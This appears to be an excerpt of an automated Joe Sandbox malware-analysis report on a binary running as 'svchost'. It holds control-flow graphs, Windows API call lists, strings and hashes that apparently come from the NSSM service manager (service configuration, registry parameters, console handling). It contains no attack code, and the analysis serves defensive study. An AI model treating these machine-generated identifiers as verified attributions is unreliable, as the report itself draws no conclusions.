                                                    • API ID: Process$AllocConsoleFreeHeapWindow__fileno__setmode$AllocateCheckCtrlCurrentDispatcherErrorHandleInitializeLastMembershipServiceStartThreadToken___lock_fhandle__setmode_nolock_doexit_memset
                                                    • String ID: NSSM$continue$edit$get$install$pause$remove$reset$restart$rotate$set$start$status$stop$unset
                                                    • API String ID: 4221750250-1322290842
                                                    • Opcode ID: 8e0dd923451d7cc970bd1a40e54186b7d1993578e1d60054d8f75cea67493da1
                                                    • Instruction ID: 8d0ce95e1571a4db95220a4f6881cac6d3a3a374ab3f9564aeafd07009bbe4f6
                                                    • Opcode Fuzzy Hash: 8e0dd923451d7cc970bd1a40e54186b7d1993578e1d60054d8f75cea67493da1
                                                    • Instruction Fuzzy Hash: D691A1F1E5030166DA10BA72AC46B5B325D4F6031EF14093FB845B22C7FA7DEE9485AE

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 182 40ec60-40ec6d 183 40ec78-40ec95 182->183 184 40ec6f-40ec77 182->184 185 40ecb0 183->185 186 40ec97-40ec9a 183->186 189 40ecb8-40ecc6 185->189 187 40eca6-40ecae 186->187 188 40ec9c-40eca4 186->188 187->189 188->189 190 40ece1-40ecee 189->190 191 40ecc8-40ecde call 412731 189->191 193 40ecf0-40ed06 call 401580 190->193 194 40ed1c-40ed21 190->194 191->190 202 40edc1-40edcd 193->202 203 40ed0c-40ed12 193->203 197 40ed23-40ed28 194->197 198 40ed2c-40ed3b call 401790 194->198 197->198 204 40ed41 198->204 205 40edce-40eddd call 4017f0 198->205 203->198 206 40ed14-40ed1a 203->206 208 40ed46-40ed52 204->208 205->208 212 40ede3-40ede9 205->212 206->198 210 40ed54 208->210 211 40ed56-40ed85 ChangeServiceConfigW 208->211 210->211 213 40ee03-40ee05 211->213 214 40ed87-40ed89 211->214 215 40edfb-40ee01 212->215 216 40edeb-40edf5 GetProcessHeap HeapFree 212->216 219 40ee17-40ee1e 213->219 220 40ee07-40ee11 GetProcessHeap HeapFree 213->220 217 40ed9b-40edab GetLastError call 4052c0 214->217 218 40ed8b-40ed95 GetProcessHeap HeapFree 214->218 221 40edb0-40edb9 call 41257c call 405470 215->221 216->215 217->221 218->217 223 40ee20-40ee3c call 40ce10 219->223 224 40ee3e-40ee4c 219->224 220->219 241 40edbe 221->241 223->202 223->224 228 40ee55-40ee66 call 40d4c0 224->228 229 40ee4e-40ee53 224->229 233 40ee69-40ee8f ChangeServiceConfig2W 228->233 229->228 229->233 235 40ee91-40ee9a GetLastError 233->235 236 40eebb-40eebe 233->236 235->236 238 40ee9c-40eeb8 call 4052c0 call 405400 235->238 239 40eec0-40eed0 call 40b700 236->239 240 40eefe-40ef07 236->240 238->236 247 40eed2-40eef4 call 41257c call 405470 239->247 248 40eef5-40eefb call 40e450 239->248 241->202 248->240
                                                    APIs
                                                    • __snwprintf_s.LIBCMT ref: 0040ECD9
                                                    • ChangeServiceConfigW.ADVAPI32(?,?,?,000000FF,00000000,00000000,00000000,0041E5D8,?,00000000,?,?,?,00000000), ref: 0040ED79
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 0040ED8E
                                                    • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0040ED95
                                                    • GetLastError.KERNEL32(?,?,00000000), ref: 0040ED9B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$ChangeConfigErrorFreeLastProcessService__snwprintf_s
                                                    • String ID: LocalSystem
                                                    • API String ID: 3404593348-3718507506
                                                    • Opcode ID: 41f063981e1366348621d5f49daee988617f9f6c866f27ec98b904e9930f1709
                                                    • Instruction ID: 6c351189403f5eb6c5fe8513cea9cc0aa6b3904080e0031a5e5be75d4344df1b
                                                    • Opcode Fuzzy Hash: 41f063981e1366348621d5f49daee988617f9f6c866f27ec98b904e9930f1709
                                                    • Instruction Fuzzy Hash: 9071ECF1904701ABE720DB65DC49FA773A8EF84308F048D3EF559A22C1E778E8558769

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 328 409920-409971 AllocateAndInitializeSid 329 409973-409989 CheckTokenMembership FreeSid 328->329 330 40998f-40999e call 412cdc 328->330 329->330
                                                    APIs
                                                    • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00409969
                                                    • CheckTokenMembership.KERNELBASE(00000000,?,0042340D,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040997E
                                                    • FreeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00409989
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                    • String ID:
                                                    • API String ID: 3429775523-0
                                                    • Opcode ID: 628fba0404b7c400409226c91e7c1594c4cf8dc2a312d52cc7af963d2352c708
                                                    • Instruction ID: 72e0c7922e14d595f5e3848571bc75bc3c4e4abfa34b06bfca4019b358322d7e
                                                    • Opcode Fuzzy Hash: 628fba0404b7c400409226c91e7c1594c4cf8dc2a312d52cc7af963d2352c708
                                                    • Instruction Fuzzy Hash: 4501A77134C380BFD301DB649985A6BBFD8AB99700FC4985EF58583242D174D408C76B

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 155 40d990-40d997 156 40da93-40da94 155->156 157 40d99d-40d9b3 155->157 158 40d9b5-40d9bb GetProcessHeap HeapFree 157->158 159 40d9bd-40d9c5 157->159 158->159 160 40d9c7-40d9cf 159->160 161 40d9e8-40d9f0 159->161 162 40d9d1-40d9d8 160->162 163 40d9da-40d9e6 GetProcessHeap HeapFree 160->163 164 40d9f2-40d9f8 GetProcessHeap HeapFree 161->164 165 40d9fa-40da02 161->165 162->162 162->163 163->161 164->165 166 40da04-40da0a GetProcessHeap HeapFree 165->166 167 40da0c-40da14 165->167 166->167 168 40da16-40da1c GetProcessHeap HeapFree 167->168 169 40da1e-40da26 167->169 168->169 170 40da28-40da29 CloseServiceHandle 169->170 171 40da2f-40da3e 169->171 170->171 172 40da40-40da41 CloseHandle 171->172 173 40da43-40da4b 171->173 172->173 174 40da54-40da5b 173->174 175 40da4d-40da4e UnregisterWait 173->175 176 40da6a-40da72 174->176 177 40da5d-40da64 DeleteCriticalSection 174->177 175->174 178 40da74-40da75 CloseHandle 176->178 179 40da77-40da80 176->179 177->176 178->179 180 40da82-40da83 FreeEnvironmentStringsW 179->180 181 40da89-40da92 GetProcessHeap RtlFreeHeap 179->181 180->181 181->156
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040D9B8
                                                    • HeapFree.KERNEL32(00000000), ref: 0040D9BB
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040D9E3
                                                    • HeapFree.KERNEL32(00000000), ref: 0040D9E6
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040D9F5
                                                    • HeapFree.KERNEL32(00000000), ref: 0040D9F8
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA07
                                                    • HeapFree.KERNEL32(00000000), ref: 0040DA0A
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA19
                                                    • HeapFree.KERNEL32(00000000), ref: 0040DA1C
                                                    • CloseServiceHandle.ADVAPI32(?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA29
                                                    • CloseHandle.KERNEL32(?,00000000,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA41
                                                    • UnregisterWait.KERNEL32(?), ref: 0040DA4E
                                                    • DeleteCriticalSection.KERNEL32(?,00000000,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA64
                                                    • CloseHandle.KERNEL32(?,00000000,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA75
                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA83
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA8C
                                                    • RtlFreeHeap.NTDLL(00000000), ref: 0040DA8F
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Free$Process$CloseHandle$CriticalDeleteEnvironmentSectionServiceStringsUnregisterWait
                                                    • String ID:
                                                    • API String ID: 223489879-0
                                                    • Opcode ID: 115bcf30406b6ff842ec37e1375dc7df3e087b6a23b02530f15371c741b9abf6
                                                    • Instruction ID: 77dd6ce9f9945231fd51557c9ffd4fac1d491a87d3cf4fd6406c7136dc2c8fa9
                                                    • Opcode Fuzzy Hash: 115bcf30406b6ff842ec37e1375dc7df3e087b6a23b02530f15371c741b9abf6
                                                    • Instruction Fuzzy Hash: 5E3112F1F04701ABE7209BB6DC45FA7B7DCAF44745F054929BA59E3280CA78EC048A38

                                                    Control-flow Graph

                                                    APIs
                                                    • __snwprintf_s.LIBCMT ref: 0040A9FA
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                    • RegCreateKeyExW.KERNELBASE(80000002,?,00000000,00000000,00000000,00020006,00000000,?,?,?,?,?,?,?,00000000), ref: 0040AA5D
                                                    • GetLastError.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0040AA69
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$Source$CreateDeregisterErrorLastRegisterReport__snwprintf_s__vsnwprintf_s_l
                                                    • String ID: AppExit$NSSM_REG_EXIT$SYSTEM\CurrentControlSet\Services\%s\Parameters\%s$create_exit_action()
                                                    • API String ID: 508490100-4149098550
                                                    • Opcode ID: 4fcb7e5af628b31a412a967c9f9c41a1b2acc9b1253a557f1fea2d54328a6c8b
                                                    • Instruction ID: c54e0a44a042602298dc2c5b83e2bd5604e14107d9abb35974e2f0600bad2026
                                                    • Opcode Fuzzy Hash: 4fcb7e5af628b31a412a967c9f9c41a1b2acc9b1253a557f1fea2d54328a6c8b
                                                    • Instruction Fuzzy Hash: FB4109F1B443006BE6209754CD4BFEB7398DB98704F50452EF64AAA1C2EAB8D544CB9B

                                                    Control-flow Graph

                                                    APIs
                                                    • __snwprintf_s.LIBCMT ref: 0040B349
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                    • __snwprintf_s.LIBCMT ref: 0040B365
                                                    • RegCreateKeyExW.KERNELBASE(80000002,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 0040B3CA
                                                    • GetLastError.KERNEL32(00000000), ref: 0040B3D6
                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,?), ref: 0040B41F
                                                    Strings
                                                    • open_registry(), xrefs: 0040B373
                                                    • NSSM_REGISTRY, xrefs: 0040B378
                                                    • SYSTEM\CurrentControlSet\Services\%s\Parameters, xrefs: 0040B354
                                                    • SYSTEM\CurrentControlSet\Services\%s\Parameters\%s, xrefs: 0040B338
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: __snwprintf_s$CreateErrorLastOpen__vsnwprintf_s_l
                                                    • String ID: NSSM_REGISTRY$SYSTEM\CurrentControlSet\Services\%s\Parameters$SYSTEM\CurrentControlSet\Services\%s\Parameters\%s$open_registry()
                                                    • API String ID: 3162672713-2180615361
                                                    • Opcode ID: 694e5b5481d173b3ab35a74997d032020c8674ed162b4220796c0d16fe997546
                                                    • Instruction ID: 51ad032d09eab74b91555c8713cdb19e4fcc5e6d9908cd399ce7877185dd2446
                                                    • Opcode Fuzzy Hash: 694e5b5481d173b3ab35a74997d032020c8674ed162b4220796c0d16fe997546
                                                    • Instruction Fuzzy Hash: 3221E6F0A443016FE220F760CD47FBB3398EB54704F90452E7659E61C2FAB8954086AA

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 316 405370-40539f GetUserDefaultLangID FormatMessageW 317 4053a1-4053b8 FormatMessageW 316->317 318 4053ee-4053f5 316->318 317->318 319 4053ba-4053e6 GetProcessHeap HeapAlloc call 412731 317->319 319->318 322 4053e8-4053ed 319->322
                                                    APIs
                                                    • GetUserDefaultLangID.KERNEL32(00401059,0000FFFF,00000000,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040537F
                                                    • FormatMessageW.KERNELBASE(00000B00,00000000,0040547B,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040539B
                                                    • FormatMessageW.KERNEL32(00000B00,00000000,0040547B,00000000,00401059,0000FFFF,00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040), ref: 004053B4
                                                    • GetProcessHeap.KERNEL32(00000000,00000040,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053BD
                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053C4
                                                    • __snwprintf_s.LIBCMT ref: 004053DC
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: FormatHeapMessage$AllocDefaultLangProcessUser__snwprintf_s__vsnwprintf_s_l
                                                    • String ID: system error %lu
                                                    • API String ID: 3208699588-1824642319
                                                    • Opcode ID: af2739f03ea27dcb77735334c53fbd1a84ab6c27a147f2b738a7d16c807b2f59
                                                    • Instruction ID: accda3c8b7d2623306d44ba6687032fe0a4120849f219a87f72b30063895a064
                                                    • Opcode Fuzzy Hash: af2739f03ea27dcb77735334c53fbd1a84ab6c27a147f2b738a7d16c807b2f59
                                                    • Instruction Fuzzy Hash: 5A01A7F16043127BE610A7659C09FBB7B9CDF807A1F10453AFA10D61C0E7B4D4059A78

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 323 401a00-401a09 GetConsoleWindow 324 401a2b-401a2c 323->324 325 401a0b-401a18 GetWindowThreadProcessId 323->325 325->324 326 401a1a-401a23 GetCurrentProcessId 325->326 326->324 327 401a25 FreeConsole 326->327 327->324
                                                    APIs
                                                    • GetConsoleWindow.KERNELBASE ref: 00401A01
                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00401A10
                                                    • GetCurrentProcessId.KERNEL32 ref: 00401A1A
                                                    • FreeConsole.KERNEL32 ref: 00401A25
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ConsoleProcessWindow$CurrentFreeThread
                                                    • String ID:
                                                    • API String ID: 3525601419-0
                                                    • Opcode ID: 5629e28a465c767bbbe1bbf1bc2c58c11f9f367261ce32223375feb305a5a444
                                                    • Instruction ID: 2f1dd8984dbdf2ce013bee9d2ff09af7205948615cb30f205b3daea2ec8f1f74
                                                    • Opcode Fuzzy Hash: 5629e28a465c767bbbe1bbf1bc2c58c11f9f367261ce32223375feb305a5a444
                                                    • Instruction Fuzzy Hash: 13D09EB0B211019BD7147B75DD4C59A77B8EE44312750C579E852D11A0DB78D440CE39

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 333 40ca70-40ca84 OpenSCManagerW 334 40caa0 333->334 335 40ca86-40ca8c 333->335 336 40ca9e 335->336 337 40ca8e-40ca9b call 405400 335->337 336->334 337->336
                                                    APIs
                                                    • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,?,00401B82,?,?,?,00000001), ref: 0040CA7C
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$Source$DeregisterManagerOpenRegisterReport
                                                    • String ID: ServicesActive
                                                    • API String ID: 2921005559-3071072050
                                                    • Opcode ID: e973317576628494c7e2fe419008a8c2cfe1cd689f8f975b8f69e46efd21db25
                                                    • Instruction ID: d605054c54634b75e85081cc8a0520dc7152891e0ecd9d3c37b7bd7883cdffd9
                                                    • Opcode Fuzzy Hash: e973317576628494c7e2fe419008a8c2cfe1cd689f8f975b8f69e46efd21db25
                                                    • Instruction Fuzzy Hash: F7D0A7B07003007AE310EB605D46F672658970074AF408436B509E11C3D1698841461A

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 340 40ae90-40ae9a 341 40aea0-40aea9 340->341 341->341 342 40aeab-40aed4 RegSetValueExW 341->342 343 40aed6-40aed7 342->343 344 40aed8-40af00 GetLastError call 4052c0 call 405400 342->344
                                                    APIs
                                                    • RegSetValueExW.KERNELBASE(0040B737,00000000,00000000,00000001,00000000,?,00000000,0040AF26,?,?,00000000,00000001,0040B737,00000000,Application,?), ref: 0040AECC
                                                    • GetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040AEDA
                                                      • Part of subcall function 004052C0: TlsGetValue.KERNEL32(00000000,?,00401042,00000000,00000000), ref: 004052C7
                                                      • Part of subcall function 004052C0: LocalAlloc.KERNEL32(00000040,0000FFFF,?,00401042,00000000,00000000), ref: 004052DA
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$SourceValue$AllocDeregisterErrorLastLocalRegisterReport
                                                    • String ID:
                                                    • API String ID: 2655982260-0
                                                    • Opcode ID: 9e4b115cd924ec1184744bcb023a8fc9515248580838a4aa222a32ded7d0333a
                                                    • Instruction ID: 0ff3c643925308dee1897a7934ae175a7d9a08f2eac1449aa01b77ecff095460
                                                    • Opcode Fuzzy Hash: 9e4b115cd924ec1184744bcb023a8fc9515248580838a4aa222a32ded7d0333a
                                                    • Instruction Fuzzy Hash: E2F0C2B15042026FEB049B14EC4AFE777ACDF84758F06C469F849DB282E674EE4586A2

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 349 405470-405482 call 405370 352 405484-405498 call 412e2d LocalFree 349->352 353 40549e-40549f 349->353 352->353
                                                    APIs
                                                      • Part of subcall function 00405370: GetUserDefaultLangID.KERNEL32(00401059,0000FFFF,00000000,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040537F
                                                      • Part of subcall function 00405370: FormatMessageW.KERNELBASE(00000B00,00000000,0040547B,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040539B
                                                      • Part of subcall function 00405370: FormatMessageW.KERNEL32(00000B00,00000000,0040547B,00000000,00401059,0000FFFF,00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040), ref: 004053B4
                                                      • Part of subcall function 00405370: GetProcessHeap.KERNEL32(00000000,00000040,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053BD
                                                      • Part of subcall function 00405370: HeapAlloc.KERNEL32(00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053C4
                                                      • Part of subcall function 00405370: __snwprintf_s.LIBCMT ref: 004053DC
                                                    • _vfwprintf.LIBCMT ref: 0040548F
                                                      • Part of subcall function 00412E2D: _vfwprintf_helper.LIBCMT ref: 00412E42
                                                    • LocalFree.KERNELBASE(00000000,?,?,?,00000000,00000000), ref: 00405498
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: FormatHeapMessage$AllocDefaultFreeLangLocalProcessUser__snwprintf_s_vfwprintf_vfwprintf_helper
                                                    • String ID:
                                                    • API String ID: 1306074386-0
                                                    • Opcode ID: e9892c6baceeda6f9f61b86e8acf41dfdb428b9bd39c5d7411bf38cb53dd31e2
                                                    • Instruction ID: 2592380da1669d33218ee91daf38bafb7c1dab6b6b9683df9bfa30739b65c589
                                                    • Opcode Fuzzy Hash: e9892c6baceeda6f9f61b86e8acf41dfdb428b9bd39c5d7411bf38cb53dd31e2
                                                    • Instruction Fuzzy Hash: 73D02BB1C0122277C120E710EC09CDF3B98DE40394F04482CF80552110D23CDC858BD6

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 356 4136fd-41370e call 4136d2 ExitProcess
                                                    APIs
                                                    • ___crtCorExitProcess.LIBCMT ref: 00413705
                                                      • Part of subcall function 004136D2: GetModuleHandleW.KERNEL32(mscoree.dll,?,0041370A,?,?,00418C5A,000000FF,0000001E,?,004140C2,?,00000001,?,?,00414556,00000018), ref: 004136DC
                                                      • Part of subcall function 004136D2: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004136EC
                                                    • ExitProcess.KERNEL32 ref: 0041370E
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                    • String ID:
                                                    • API String ID: 2427264223-0
                                                    • Opcode ID: 6cf1626b48435327ff5cf8a7c1fce1047595b6b51481a4f821607c6479e48e72
                                                    • Instruction ID: c773c40137fd1d48a63a92fcfe9ea896ee907ee475da7e957b21ec7d4b05a1b8
                                                    • Opcode Fuzzy Hash: 6cf1626b48435327ff5cf8a7c1fce1047595b6b51481a4f821607c6479e48e72
